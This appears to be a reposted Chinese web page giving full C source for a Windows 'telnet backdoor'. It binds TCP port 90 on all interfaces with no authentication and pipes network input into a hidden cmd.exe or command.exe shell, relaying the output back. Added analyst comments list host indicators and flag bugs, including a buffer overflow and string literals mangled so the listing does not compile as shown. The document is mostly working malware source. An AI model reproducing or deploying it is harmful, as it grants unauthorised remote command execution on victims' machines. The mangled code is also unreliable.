一个Telnet后门程序(转)



/****************************************************
 created  : 2004/10/09
 created  : 9:10:2004   9:37
 file base : tini
 file ext : c
 author  : XueFeng
 
 purpose  : telnet backdoor
****************************************************/

#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "kernel32.lib")

// TCP port the listener in main() binds to. For defenders: an unexpected
// listener on this port is a simple host/network indicator for this sample.
#define PORT 90
// Listening socket and the most recently accepted client socket. Both are
// plain globals shared by main() and the two relay threads; no locking is
// visible anywhere in this file.
SOCKET ServerSocket = INVALID_SOCKET;
SOCKET ClientSocket = INVALID_SOCKET;
// Ends of two anonymous pipes:
//   hReadPipe / hWriteFile  - created in ThreadFuncA (socket -> child stdin)
//   hReadFile / hWritePipe  - created in ThreadFuncB (child stdout/stderr -> socket)
HANDLE hReadPipe, hWritePipe, hWriteFile, hReadFile;
// Flags set to 1 by ThreadFuncA / ThreadFuncB right after their CreatePipe
// call; main() polls them before starting the child process.
unsigned char varA,varB;

// Receives data from the Telnet client.
//
// Thread entry point: creates the pipe whose read end (hReadPipe) main()
// later hands to the child process as stdin, then loops forever copying
// whatever arrives on the global ClientSocket into the write end of that pipe.
// lpParam is not used. The loop never exits, so the final return is not
// reached.
//
// Analyst note: bytes from the network are passed to the shell unmodified;
// no authentication, filtering or encryption step is present in this function.
DWORD WINAPI ThreadFuncA(LPVOID lpParam)
{
    SECURITY_ATTRIBUTES pipeattr;
    DWORD nByteToWrite, nByteWritten;
    char recv_buff[1024];
 
    pipeattr.nLength = sizeof(SECURITY_ATTRIBUTES);
    pipeattr.lpSecurityDescriptor = NULL;
    // Handles must be inheritable so the child process created in main()
    // can use the pipe end as its standard input.
    pipeattr.bInheritHandle = TRUE;
 // Create the pipe (return value is not checked).
    CreatePipe(&hReadPipe, &hWriteFile, &pipeattr, 0);
    // Signal main() that this thread's pipe handles have been written.
    varA = 1;
    while(TRUE)
    {
        Sleep(250);
        // NOTE(review): recv() is called on whatever ClientSocket currently
        // holds (INVALID_SOCKET until main() accepts a connection), and its
        // return value is stored in a DWORD and passed to WriteFile without
        // being checked for 0 or SOCKET_ERROR.
        nByteToWrite = recv(ClientSocket, recv_buff, 1024, 0);
        WriteFile(hWriteFile, recv_buff, nByteToWrite, &nByteWritten, NULL);
    }
    return 0;
}

// Sends the output of executed commands back to the Telnet client.
//
// Thread entry point: creates the pipe whose write end (hWritePipe) main()
// later hands to the child process as stdout and stderr, then loops forever
// reading from the read end and sending the bytes on the global ClientSocket.
// lpParam is not used. The loop never exits, so the final return is not
// reached.
//
// Analyst note: command output leaves the host in clear text on the same TCP
// connection; nothing in this function encrypts or encodes it.
DWORD WINAPI ThreadFuncB(LPVOID lpParam)
{
    SECURITY_ATTRIBUTES pipeattr;
    DWORD len;
    char send_buff[25000];

    pipeattr.nLength = sizeof(SECURITY_ATTRIBUTES);
    pipeattr.lpSecurityDescriptor = NULL;
    // Inheritable so the child process can write to the pipe.
    pipeattr.bInheritHandle = TRUE;
    // Return value is not checked.
    CreatePipe(&hReadFile, &hWritePipe, &pipeattr, 0);
    // Signal main() that this thread's pipe handles have been written.
    varB = 1;
    while (TRUE)
    {
        // NOTE(review): neither the ReadFile nor the send result is checked;
        // len is used as the send length whatever ReadFile returned.
        ReadFile(hReadFile, send_buff, 25000, &len, NULL);
        send(ClientSocket, send_buff, len, 0);
    }
    return 0;
}
// Program entry point.
//
// What the visible code does, in order:
//   1. Starts Winsock and opens a TCP listener on PORT, bound to INADDR_ANY
//      (every local interface).
//   2. Starts the two relay threads, which create the stdin and stdout pipes.
//   3. Launches the system command interpreter once, with a hidden window and
//      its standard handles redirected to those pipes.
//   4. Accepts connections forever, storing each new socket in ClientSocket.
//
// Defender notes (all derived from the calls below):
//   - No credential check, allow-list or encryption is present; any host that
//     can reach the port is connected to the shell.
//   - Useful host indicators: a process that owns a listening TCP socket and
//     is the parent of cmd.exe / command.exe started with SW_HIDE and pipe
//     handles as stdin/stdout/stderr.
//   - The single child process is created before the first accept(), so every
//     accepted connection is wired to the same shell; earlier client sockets
//     are overwritten in ClientSocket without being closed.
//   - None of the Winsock setup calls (WSAStartup, socket, bind, listen) has
//     its return value checked.
void main(void)
{
    WSADATA WSAData;
    struct sockaddr_in RemoteAddr;
    DWORD dwThreadIdA, dwThreadIdB, dwThreadParam=0;
    OSVERSIONINFO osvi;
    PROCESS_INFORMATION processinfo;
    STARTUPINFO startinfo;
 // NOTE(review): szAPP holds 256 bytes, but GetSystemDirectory below is told
 // the buffer is MAX_PATH + 1 bytes, and strcat then appends to it unbounded.
 char szAPP[256];

 // Create the Telnet-style service: listen and wait for client connections.
    WSAStartup(MAKEWORD(2,2), &WSAData);
    ServerSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    RemoteAddr.sin_family = AF_INET;
    RemoteAddr.sin_port = htons(PORT);
    // INADDR_ANY: the listener is reachable on every interface of the host.
    RemoteAddr.sin_addr.S_un.S_addr = htonl(INADDR_ANY);
    bind(ServerSocket, (LPSOCKADDR)&RemoteAddr, sizeof(RemoteAddr));
    listen(ServerSocket, 5);
    varA = 0;
    varB = 0;
    CreateThread(NULL, 0, ThreadFuncA, NULL, 0, &dwThreadIdA);
    CreateThread(NULL, 0, ThreadFuncB, NULL, 0, &dwThreadIdB);
    // Poll every 250 ms until the relay threads report their pipes.
    // NOTE(review): as written, the loop ends as soon as EITHER flag is
    // non-zero, not both.
    do
 {
  Sleep(250);
    } while((varA || varB) == 0);
    GetStartupInfo(&startinfo);
 // Configure the child as a background process: hidden window, standard
 // handles taken from the two pipes instead of a console.
    startinfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    startinfo.hStdInput = hReadPipe;
    startinfo.hStdError = hWritePipe;
    startinfo.hStdOutput = hWritePipe;
    startinfo.wShowWindow = SW_HIDE;
    osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    GetVersionEx(&osvi);
    GetSystemDirectory(szAPP, MAX_PATH + 1);
    // dwPlatformId 2 is VER_PLATFORM_WIN32_NT; the other branch covers the
    // remaining platform ids and uses command.exe instead of cmd.exe.
    if (osvi.dwPlatformId == 2)
    {
        // NOTE(review): the string literal below is split across two lines on
        // this page (mangled during web extraction), so the listing does not
        // compile as shown. The same applies to the literal in the else branch.
        strcat(szAPP, "
//cmd.exe");
        // bInheritHandles is TRUE so the child receives the pipe handles.
        if (CreateProcess(szAPP, NULL, NULL, NULL, TRUE, 0, NULL, NULL, &startinfo,
   &processinfo) == 0)
        {
            printf ("Create Process Error!/n");
            return;
        }
    }
    else
    {
        strcat(szAPP, "
//command.exe");
        // Result is not checked on this branch.
        CreateProcess(NULL, szAPP, 0, 0, TRUE, 0, 0, 0, &startinfo, &processinfo);
    }
    // Accept loop: each new connection replaces ClientSocket, which the relay
    // threads read on their next iteration. The peer address is not recorded
    // (both address arguments are NULL).
    while (TRUE)
    {
  ClientSocket = accept(ServerSocket, NULL, NULL);
        Sleep(250);
    }
}
